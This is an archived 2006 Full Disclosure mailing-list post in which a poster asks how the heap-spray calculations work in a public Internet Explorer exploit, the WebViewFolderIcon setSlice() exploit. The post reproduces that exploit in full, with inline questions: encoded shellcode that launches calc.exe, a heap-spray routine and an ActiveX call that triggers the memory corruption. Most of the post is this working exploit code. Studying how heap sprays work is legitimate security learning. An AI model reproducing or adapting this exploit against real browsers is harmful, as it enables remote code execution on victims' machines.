Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Regarding the heap spray.

Regarding the heap spray.

From: . Solo <soloaway_at_gmail.com>
Date: Mon, 20 Nov 2006 18:16:56 +0800

Hi all,

I was testing an old exploit -- Internet Explorer WebViewFolderIcon
setSlice() Exploit http://www.milw0rm.com/exploits/2448
some place I am not really understand:

*Question inline.....*

<!--

..::[ jamikazu presents ]::..

Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2

Author: jamikazu
Mail: jamikazu_at_gmail.com

Bug discovered by Computer H D Moore (http://www.metasploit.com)

Credit: metasploit, SkyLined

invokes calc.exe if successful

-->

<HTML>
<BODY>
<SCRIPT language="javascript">

var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000; <=====Why the
heapBlockSize set for 0x400000,the base address of IE.
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
<===== the spraySlideSize use for controlling the size of spray, why getting
it through "heapBlockSize - (payLoadSize+0x38)"?

var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
<==heapBlocks is the size of using for fill in the memory, why getting it
through "(heapSprayToAddress - 0x400000)/heapBlockSize"

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

   for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</SCRIPT>

</BODY>
</HTML>

///////////////////////////////////////////////////////

*I am not quite sure whether i describe my question clearly, Thanks for your
helping*

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Nov 20 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos